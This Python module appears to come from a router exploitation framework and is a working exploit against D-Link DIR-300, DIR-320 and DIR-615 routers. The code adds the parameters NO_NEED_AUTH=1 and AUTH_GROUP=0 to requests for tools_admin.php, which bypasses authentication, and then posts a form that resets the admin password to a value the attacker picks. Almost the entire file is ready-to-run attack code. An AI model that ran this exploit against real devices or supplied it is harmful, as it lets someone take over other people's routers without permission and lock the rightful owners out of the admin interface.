# Name:D-link DIR-300 DIR-320 and DIR-615 authentication bypass and password change
# File:dir300_615_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 18.07.2016
# Last modified: 18.07.2016
# Shodan Dork:
# Description: Auth bypass and password change on DIR-300, 320 and 615
#              Strange behaviour experienced between DIR-300 FW:2.04 and FW:2.05
#              When using this exploit on 2.04 password is changed, but when using dir300_600_info
#              /etc/passwd shows old password, but that is not working anymore,
#              anyhow on FW:2.05 this exploit works, but won't change password
#              although dir300_600_info reveals password
#              I suspect that tools_admin.xgi has to commit the changes to /etc/passwd, but that won't happen
#              because request like
# /tools_admin.xgi?random_num=2016.7.17.17.31.17&exeshell=submit%20COMMIT&exeshell=submit%20HTTPD_PASSWD HTTP/1.1
#              will get response 401 Not Authorized
# Based on: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf

import core.Exploit
import core.io

import requests
import interface.utils
from interface.messages import print_error, print_success, print_help, print_info, \
    print_warning


class Exploit(core.Exploit.RextExploit):
    """
Name:D-link DIR-300 DIR-320 and DIR-615 authentication bypass and password change
File:dir300_615_auth_bypass.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 18.07.2016
Description: Auth bypass and password change on DIR-300 (tested FW2.04),320 (tested FW1.21) and 615 (not tested)
Based on: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf

Options:
    Name        Description

    host        Target host address
    port        Target port
    password    New password to admin interface
    """
    password = ""

    def __init__(self):
        self.password = "password"
        core.Exploit.RextExploit.__init__(self)

    def do_set(self, e):
        args = e.split(' ')
        try:
            if args[0] == "host":
                if interface.utils.validate_ipv4(args[1]):
                    self.host = args[1]
                else:
                    print_error("please provide valid IPv4 address")
            elif args[0] == "port":
                if str.isdigit(args[1]):
                    self.port = args[1]
                else:
                    print_error("port value must be integer")
            elif args[0] == "password":
                self.password = ' '.join(args[1:])
        except IndexError:
            print_error("please specify value for variable")

    def do_password(self, e):
        print_info(self.password)

    def help_password(self):
        print_help("Prints current value of password")

    def do_run(self, e):
        url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and 'name="admin_password1"' in response.text:
                print_success("target seems vulnerable")
                print_success("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL")
                print_info("Changing admin password")
                headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                           'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                           'Accept-Encoding': 'gzip, deflate',
                           'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                           }
                payload = {'NO_NEED_AUTH': 1,
                           'AUTH_GROUP': 0,
                           'ACTION_POST': 1,
                           'apply': 'Save+Settings',
                           'admin_name': 'admin',
                           'admin_password1': '%s' % self.password,
                           'admin_password2': '%s' % self.password,
                           'grap_auth_enable_h': 0,
                           'rt_ipaddr': '0.0.0.0'}
                url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
                response = requests.post(url=url, headers=headers, data=payload, timeout=60)
                if response.status_code == 200:
                    print_success("password seems to be changed try to login with: %s" % self.password)
                else:
                    print_error("password change failed")

            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Exploit()
